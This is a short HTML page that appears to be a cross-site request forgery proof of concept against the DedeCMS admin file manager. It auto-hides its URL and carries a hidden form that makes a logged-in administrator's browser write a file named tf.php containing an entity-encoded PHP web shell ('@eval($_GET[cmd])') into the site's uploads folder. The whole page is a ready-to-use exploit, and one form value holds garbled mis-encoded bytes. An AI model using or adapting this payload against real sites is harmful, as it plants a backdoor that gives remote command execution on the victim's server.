<html>
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://192.168.25.176/dedecms/uploads/dede/file_manage_control.php" method="POST">
      <input type="hidden" name="fmdo" value="edit" />
      <input type="hidden" name="backurl" value="" />
      <input type="hidden" name="activepath" value="&#47;dedecms&#47;uploads&#47;uploads" />
      <input type="hidden" name="filename" value="tf&#46;php" />
      <input type="hidden" name="str" value="&lt;&#63;php&#32;&#64;eval&#40;&#36;&#95;GET&#91;cmd&#93;&#41;&#59;&#63;&gt;" />
      <input type="hidden" name="B1" value="&#32;&#32;�&#191;&#157;&#32;�&#173;&#152;&#32;&#32;" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

